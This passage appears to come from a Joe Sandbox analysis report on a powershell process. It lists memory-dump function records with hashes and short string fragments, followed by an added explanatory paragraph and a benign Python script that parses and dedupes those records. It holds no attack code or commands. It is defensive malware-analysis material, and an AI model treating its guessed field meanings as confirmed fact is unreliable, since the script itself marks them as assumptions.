                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 74868353d83e685e9f603d173522ff7ac51c2f69f70441ad543a133522c90046
                                        • Instruction ID: b3ccc7de48dfa318087be1f83ad649823c0fd7609dd9ca2b86ab6eed993f3ec0
                                        • Opcode Fuzzy Hash: 74868353d83e685e9f603d173522ff7ac51c2f69f70441ad543a133522c90046
                                        • Instruction Fuzzy Hash: 06314970B002099FDB04DFB9D895BEEBBF6AF89354F149029E405EB354EB758C818B61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b3ad049e32cd7711c1bf39c7a8587d21ebd3d9e6f5f4059ff5ced28ca4669b7
                                        • Instruction ID: cc97566ec2a4513137072b1bd1f215b6d2817e0764e98eea6c095e7bf5c8bb6e
                                        • Opcode Fuzzy Hash: 2b3ad049e32cd7711c1bf39c7a8587d21ebd3d9e6f5f4059ff5ced28ca4669b7
                                        • Instruction Fuzzy Hash: 52311474B002048FCB14DF68D558A9EBBF2BF88315F14452AE406EB3A0DF74AC85CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 89a81f372b598e89feb21e48b8810b6f8c97d28a2eeff44eae2f79713c210d99
                                        • Instruction ID: e5e2c62334e75c4f52027588538e19193547fbffafe6e93f9a171069ad882f18
                                        • Opcode Fuzzy Hash: 89a81f372b598e89feb21e48b8810b6f8c97d28a2eeff44eae2f79713c210d99
                                        • Instruction Fuzzy Hash: 5931F475B002058FCB14DF68D558A9EBBF2BF88315F14452AE406EB3A1DF74AC85CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af09527671dc2db910d5f2801747d983d71939941eead3df8cdcb7dedcbc4cb6
                                        • Instruction ID: de17c1009ac7f2933b5a6086bfc7ec83d3eba4db39d08e34ae17fab3576b1de7
                                        • Opcode Fuzzy Hash: af09527671dc2db910d5f2801747d983d71939941eead3df8cdcb7dedcbc4cb6
                                        • Instruction Fuzzy Hash: 6C312F74E001099FDB04EFA8D456ABEB7B3FF84300F118478E115AB395DE399E458B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1823795455.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_86d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d004ab8860f6f3ed13fd2c47ebfd2850e033425b952ab5ee3b77bf8316af4c2d
                                        • Instruction ID: 6dc049799ad17748aff5ba30bd59a5ca68e937e666c8bccb00818385407fdf18
                                        • Opcode Fuzzy Hash: d004ab8860f6f3ed13fd2c47ebfd2850e033425b952ab5ee3b77bf8316af4c2d
                                        • Instruction Fuzzy Hash: BB21F475500204EFCB05DF54E9C4B16BF65FB98318F24C5B9EA098B267C336D856CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7513e5143fcd406662dd3df111e149289e4be859d3835d5cca36b2a48b8e7a19
                                        • Instruction ID: 736f1ce387ee88b32b2f78b0a51f5ce5650e41a31fe0f038ff8fd7b0938ccb00
                                        • Opcode Fuzzy Hash: 7513e5143fcd406662dd3df111e149289e4be859d3835d5cca36b2a48b8e7a19
                                        • Instruction Fuzzy Hash: 8C11E7724497A88FCB218F34B4002E9BFA0EF15360B288AAFD5EAD7691C3359249C755
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc163a8d5c0dc3347af480796a36ec5e64229c56458389e269510206fb134c8d
                                        • Instruction ID: e558884bc062f046c941e9387138dd6fd6562d70cd645574cc6e6e20e81259bd
                                        • Opcode Fuzzy Hash: dc163a8d5c0dc3347af480796a36ec5e64229c56458389e269510206fb134c8d
                                        • Instruction Fuzzy Hash: 17112B79B001188FCB14DBACE9409EE77FAFBC8365B1140A5E509EB325DA35DD41CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1408553678a9fc3596025219fbbc31e31cbc2260aa30baf0a1ce2923a9b8b18e
                                        • Instruction ID: 0de317ba291a89af1f6f6bc6566bc97450b20ac40bb2fe41e13504112f332b5d
                                        • Opcode Fuzzy Hash: 1408553678a9fc3596025219fbbc31e31cbc2260aa30baf0a1ce2923a9b8b18e
                                        • Instruction Fuzzy Hash: 9B1194B27002259FEB64CE85C981F6AB7EAFB84314F55C269E9148B351C772EC41C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1823795455.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_86d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                        • Instruction ID: 39d6a8f67947a0dc6339896cf0c4daae6edfddcf39b5c9cfd7de1ecaee331e44
                                        • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                        • Instruction Fuzzy Hash: 7B218C76504240DFCB06CF54E9C4B16BF62FB98318F24C5A9D9094A266C33AD86ACB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eec247b31546c893f102108f219c1ad57a297efe2220e7121f0b07b0ffaade93
                                        • Instruction ID: 2bc7566b66be9e6e86b37008c17ddcb7dcb138463e6a52dc5ad1afb867a25cc9
                                        • Opcode Fuzzy Hash: eec247b31546c893f102108f219c1ad57a297efe2220e7121f0b07b0ffaade93
                                        • Instruction Fuzzy Hash: F21104322083504FC715CB39E0947DA7FE1EF46314B2844AEE59AC76A2CA30AC85C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e16b9f4e4b69401c49d77027cc37cf14d63201f981304783ef767e687113ee42
                                        • Instruction ID: 58bba7b714b32e7480280e293a5f72a4c0b66ef0b849d63033080be192acdf4b
                                        • Opcode Fuzzy Hash: e16b9f4e4b69401c49d77027cc37cf14d63201f981304783ef767e687113ee42
                                        • Instruction Fuzzy Hash: 0D014C76B00215DFCB159FB4E808AAEBBB5FF88315F10406AE51A93241DB36A915CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 457cd229858d801c4461c7576e112ed8bd59909bc1dc6503bd4ea239518bcb74
                                        • Instruction ID: 008c67cd4e6c4b9bf87ce39db77f289b708c216b3497811cd0b82c77069a2c57
                                        • Opcode Fuzzy Hash: 457cd229858d801c4461c7576e112ed8bd59909bc1dc6503bd4ea239518bcb74
                                        • Instruction Fuzzy Hash: 7E01647270D2D04FD7054B3CAC806FABFE5EFA6211B0800EEF080CB262C664C945C710
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c10c5224ba02802b643879780b19f14c9ae69cdf2c405fa503421a38d065be0c
                                        • Instruction ID: e12c978d5369b959e284d779c4892da06a48596440a5b595613753ba3e13a833
                                        • Opcode Fuzzy Hash: c10c5224ba02802b643879780b19f14c9ae69cdf2c405fa503421a38d065be0c
                                        • Instruction Fuzzy Hash: F511F374A05109EFDB05CBA8D584ADDFBB2AF48314F28C159E414AB365C771ED86CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 105ca6bb7b0b3212cb2537db47a460abbbf385ae7cb981476feb0734ed823950
                                        • Instruction ID: 696b85ee29cb934a82743252444fbf9aee7c518e4bb3a75597c4f1e5dc31c136
                                        • Opcode Fuzzy Hash: 105ca6bb7b0b3212cb2537db47a460abbbf385ae7cb981476feb0734ed823950
                                        • Instruction Fuzzy Hash: 8D11F7342057508FC728DF35D0409A6B7F6AF8921972089ADD48A8BBA0CB32F845CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1823795455.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_86d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc82547bd181fc91c6e97eb0f219ee90ae6619f009b9eb9cafebbdbf32625891
                                        • Instruction ID: 96487176f9d9a7b268f48f815e5826485be8f2bc0194f4ecaa53e46b753efe6d
                                        • Opcode Fuzzy Hash: fc82547bd181fc91c6e97eb0f219ee90ae6619f009b9eb9cafebbdbf32625891
                                        • Instruction Fuzzy Hash: 33012B31A087449AE7208A25CDC4B67BFDCFF41324F18C42AED088F146C279D841C6B2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d49661253e75ec9c61cde73e6a73a4d82e3a94f58073d4ca8c67da716bbe2c3a
                                        • Instruction ID: f00c31361bf46a478ba9ab52c1b991f079b185cc7aac94d5130895eb0b373aa1
                                        • Opcode Fuzzy Hash: d49661253e75ec9c61cde73e6a73a4d82e3a94f58073d4ca8c67da716bbe2c3a
                                        • Instruction Fuzzy Hash: 8101D1317093A41FD7118A7A9C80AABBFE9EF8A62070840AFF444C7252DA60CD04C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        • Opcode Fuzzy Hash: f74a91bf1f997fcf6d312ea3742373bb17c3fb687e9b337549ea7cf746f32c30
                                        • Instruction Fuzzy Hash: 6DD06734A142098FCB44EFB8F45A9AEBBB5BB48305F504169E90AA3754DA345851CBD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8ff39310d40e09c332e76538f119ecc9f68c32d02deed437d60315e868b81dc4
                                        • Instruction ID: 830afbced09d368ee463e431764f6fc33c5edab381920b1508868af0cc2bb077
                                        • Opcode Fuzzy Hash: 8ff39310d40e09c332e76538f119ecc9f68c32d02deed437d60315e868b81dc4
                                        • Instruction Fuzzy Hash: 77B092310457098FC2196F75E808815B36DBA4020A38008A9E50E0A6928E3AE841CF45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
                                        • Instruction ID: 8c75e3626636dff6be8af57f7352d455b8fd905b270d0aed856721f13c6e9dad
                                        • Opcode Fuzzy Hash: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
                                        • Instruction Fuzzy Hash: EFB01237A00008C5DF00CBC4F0043ECF770E7C0336F100067D60C72500833002A45692
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf08411db0256f4d14ce8af34ab5e4d1908d2d196fb20efa5578b5e00487650e
                                        • Instruction ID: fb7673d8a68dff74e6b57236146b9a6abfd6a105a35ab4ac058b5d6150bb4423
                                        • Opcode Fuzzy Hash: bf08411db0256f4d14ce8af34ab5e4d1908d2d196fb20efa5578b5e00487650e
                                        • Instruction Fuzzy Hash: 12A02232B2022003BF0CEA38022A2BA323323C0302300C02A8003E0000CC328082F800
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$4'^q$4'^q$4'^q$4'^q
                                        • API String ID: 0-2717029046
                                        • Opcode ID: 1372ef50978de4f79c540c49e16560738f5c41385bec14b69dc9415b3b32d114
                                        • Instruction ID: 61ee119d043d6373e9c877f6c9684482490de1f41a6ce89789959867a3311f7d
                                        • Opcode Fuzzy Hash: 1372ef50978de4f79c540c49e16560738f5c41385bec14b69dc9415b3b32d114
                                        • Instruction Fuzzy Hash: AFD175727043658FC7159B78D81476ABFE2AFC2210F1485BBE54ACB352DA328C46D7E2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $cuk$4'^q$4'^q$tP^q$tP^q
                                        • API String ID: 0-2963468526
                                        • Opcode ID: 3d4f97fde8df08f123149d761d546feb25fae2aec80ebd6dc02db5d5b1d35300
                                        • Instruction ID: d60278de256904c7ddae5d87c36349572bcd2bc546467b8c1f2160918dcd912c
                                        • Opcode Fuzzy Hash: 3d4f97fde8df08f123149d761d546feb25fae2aec80ebd6dc02db5d5b1d35300
                                        • Instruction Fuzzy Hash: C7915F73B043268FC7259BA8941466BBBE6BFC5210F15C6ABD415DF251DA32CC4BC3A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (_^q$(_^q$(_^q$(_^q$(_^q
                                        • API String ID: 0-3429793122
                                        • Opcode ID: 5062fdf8dbc7eb2683939a2e06d27256b4749a36a9ad4ebf31cd3d48cfb0e155
                                        • Instruction ID: 08a323d4baebf1b9a4d42c1756893b761fc022aa0fc7be9380730c272792571e
                                        • Opcode Fuzzy Hash: 5062fdf8dbc7eb2683939a2e06d27256b4749a36a9ad4ebf31cd3d48cfb0e155
                                        • Instruction Fuzzy Hash: 7821A4BAA083918FC3198F698414025FFF1AFC661032D89DBC455DF3A6DA389D4ACB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `_q$`_q$`_q$`_q
                                        • API String ID: 0-3297199963
                                        • Opcode ID: 05651ff23e3053e3544fb8760166bf124f68da374d6f149bd359ea6239ca2fec
                                        • Instruction ID: bb84ac2948f353d33a31056a3c99562da52cc3ef42b95f63193ba68fe13c2b45
                                        • Opcode Fuzzy Hash: 05651ff23e3053e3544fb8760166bf124f68da374d6f149bd359ea6239ca2fec
                                        • Instruction Fuzzy Hash: C9B1A374E006099FCB55DFA9D980A9DFBF2FF88304F108629E419AB355DB30A945CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `_q$`_q$`_q$`_q
                                        • API String ID: 0-3297199963
                                        • Opcode ID: c5b2cdc0a6f363fe25d8554c1210a95f8ea06737dd6ea829bf27d402bff62e2b
                                        • Instruction ID: 04ea64e41b68847bbb3df256061777a429038b778d43f38a53cc4ff99a2c9f34
                                        • Opcode Fuzzy Hash: c5b2cdc0a6f363fe25d8554c1210a95f8ea06737dd6ea829bf27d402bff62e2b
                                        • Instruction Fuzzy Hash: 93B18274E016099FCB54DFA9D980A9DFBF2FF88304F108629E419AB355DB30A949CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (_^q$(_^q$(_^q$(_^q
                                        • API String ID: 0-2697572114
                                        • Opcode ID: 7a0bddb422323482df739170e1e1fae2f3a0f0c02f6cf3652225642ec0f67882
                                        • Instruction ID: 1fc7cac771c5575a537159d64f7b186f71d3a99c6eb83b74f70373d37e016d10
                                        • Opcode Fuzzy Hash: 7a0bddb422323482df739170e1e1fae2f3a0f0c02f6cf3652225642ec0f67882
                                        • Instruction Fuzzy Hash: 0F1104FBB082218BC7148A6E900012AF7EAAFD1720728843FD415CB350DE36D947D790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (_^q$(_^q$(_^q$(_^q
                                        • API String ID: 0-2697572114
                                        • Opcode ID: 51e41eab5d99dc550da9012cf05d48366912f65cbe4dad1b589efd0511f46e90
                                        • Instruction ID: f56c0d415c5affc451eb4f58e5f98d8ff67fc6f17ee7926932b86f8152954e50
                                        • Opcode Fuzzy Hash: 51e41eab5d99dc550da9012cf05d48366912f65cbe4dad1b589efd0511f46e90
                                        • Instruction Fuzzy Hash: D201D2BAA083919FC7064A2E44000B6FFF5AFC362072D41ABD450DF292DA39990AC7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$$^q$$^q
                                        • API String ID: 0-2049395529
                                        • Opcode ID: c075cc8e1410d0d45f9512161aeda489e10f3300716ee13b0293e6cb7618e32f
                                        • Instruction ID: 23b663d2aa7c3d2aa74ce14e0e3810c857e31da74d9da07f228764d9fe64b477
                                        • Opcode Fuzzy Hash: c075cc8e1410d0d45f9512161aeda489e10f3300716ee13b0293e6cb7618e32f
                                        • Instruction Fuzzy Hash: AD01842170E3DA4FC32B12681924169BFBA5F8755071A45DBD041DF3A7CE158C8A83A7
                                        Uniqueness

                                        Uniqueness Score: -1.00%
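
The entries above are the per-function records the Joe Sandbox IDA plugin emits for each memory dump: one "Memory Dump Source" block per function, keyed by its Opcode ID, with the dump file name, the snapshot it was taken from and, where present, the APIs the function calls. The Python script below is an added example and is not part of the report or of Joe Sandbox. It parses these blocks, decodes the .sdmp file name into PID, stage and base address (the report's own Snapshot File names confirm those three fields; reading the fifth field as the page-protection constant, 0x40 = PAGE_EXECUTE_READWRITE, is an assumption), cross-checks the dump name against the Offset and Snapshot File values, separates functions that the report lists twice, and collects the API call sites. The sample input is assembled from three entries on this page.

```python
# Added example (not Joe Sandbox code): parse the per-function metadata blocks
# of a Joe Sandbox report, decode the .sdmp dump names, separate functions that
# are listed twice and collect the API call sites.
import re

# Sample input assembled from three entries on this page; the second function
# is listed twice in the report, which the sample reproduces.
BLOCK_A = """\
APIs
• SetThreadToken.KERNELBASE(?), ref: 087E365A
Memory Dump Source
• Source File: 0000001C.00000002.2082348655.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd
Similarity
• API ID: ThreadToken
• API String ID: 3254676861-0
• Opcode ID: 0f8d4210d657302235e17099d92702f7cdb31ddbc6a7b211a069a7278bdc0bbf
• Instruction ID: 810d342de700c254d46b71a4e46464e1259731c4dc25790a00a268f7e8799556
Uniqueness Score: -1.00%
"""
BLOCK_B = """\
Memory Dump Source
• Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
Similarity
• API ID:
• Opcode ID: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
• Instruction ID: 8c75e3626636dff6be8af57f7352d455b8fd905b270d0aed856721f13c6e9dad
Uniqueness Score: -1.00%
"""
SAMPLE = BLOCK_A + BLOCK_B + BLOCK_B

FIELD = re.compile(r"^•\s*([^:]+):\s*(.*)$")
API_REF = re.compile(r"^•\s*(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)$")
# <pid hex>.<stage>.<id>.<base address>.<field 5>.<...>.sdmp -- PID, stage and
# base address are confirmed by the Snapshot File names in the report.
SDMP = re.compile(r"^([0-9A-Fa-f]{8})\.(\d+)\.\d+\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\..*\.sdmp$")
SNAPSHOT = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-f]+)_(.+)\.jbxd$")


def decode_sdmp_name(name):
    m = SDMP.match(name)
    if not m:
        raise ValueError(f"unexpected dump name: {name!r}")
    # Assumption: field 5 is the region's page protection
    # (0x40 == PAGE_EXECUTE_READWRITE, as expected for JIT or unpacked code).
    return {"pid": int(m.group(1), 16), "stage": int(m.group(2)),
            "base": int(m.group(3), 16), "protect": int(m.group(4), 16)}


def _enrich(rec):
    f = rec["fields"]
    parts = [p.strip() for p in f.get("Source File", "").split(",")]
    try:
        rec["dump"] = decode_sdmp_name(parts[0])
    except ValueError:
        rec["dump"] = None
    offset = next((int(p.split(":", 1)[1], 16) for p in parts if p.startswith("Offset:")), None)
    snap = SNAPSHOT.match(f.get("Snapshot File", ""))
    rec["process"] = snap.group(4) if snap else None
    # Cross-check: dump name, Offset and Snapshot File must describe one region.
    rec["consistent"] = (snap is not None and rec["dump"] is not None
                         and offset == rec["dump"]["base"]
                         and int(snap.group(1)) == rec["dump"]["pid"]
                         and int(snap.group(3), 16) == rec["dump"]["base"])
    return rec


def parse_report(text):
    records, pending_apis, current, section = [], [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):          # a section heading
            section = line
            if line == "Memory Dump Source":  # API references precede their block
                current = {"apis": pending_apis, "fields": {}}
                pending_apis = []
                records.append(current)
            continue
        if section == "APIs":
            m = API_REF.match(line)
            if m:
                pending_apis.append({"api": m.group(1), "module": m.group(2),
                                     "ref": int(m.group(4), 16)})
        elif current is not None and (m := FIELD.match(line)):
            current["fields"][m.group(1).strip()] = m.group(2).strip()
    return [_enrich(r) for r in records]


def dedupe(records):
    """Split records into first occurrences and repeats, keyed on Opcode ID."""
    seen, unique, dupes = set(), [], []
    for rec in records:
        key = rec["fields"].get("Opcode ID")
        (dupes if key in seen else unique).append(rec)
        seen.add(key)
    return unique, dupes


def api_call_sites(records):
    return [(a["api"], a["module"], a["ref"], r["process"], r["dump"]["pid"] if r["dump"] else None)
            for r in records for a in r["apis"]]


if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    unique, dupes = dedupe(recs)
    print(f"{len(recs)} entries, {len(unique)} unique functions, {len(dupes)} repeats")
    for api, mod, ref, proc, pid in api_call_sites(unique):
        print(f"{api}.{mod} at {ref:08X} in {proc} (PID {pid})")
```

Run it against the text of a full report (copy the function listing into a file and pass it to parse_report) to get one record per function; the consistency flag catches entries whose dump name, Offset and Snapshot File disagree, which is the first thing to check before trusting the PID and address attribution of an API call site.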

                                        Execution Graph

                                        Execution Coverage: 6.7%
                                        Dynamic/Decrypted Code Coverage: 0%
                                        Signature Coverage: 0%
                                        Total number of Nodes: 3
                                        Total number of Limit Nodes: 0
                                        execution_graph 18877 87e35f8 18878 87e363b SetThreadToken 18877->18878 18879 87e3669 18878->18879

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
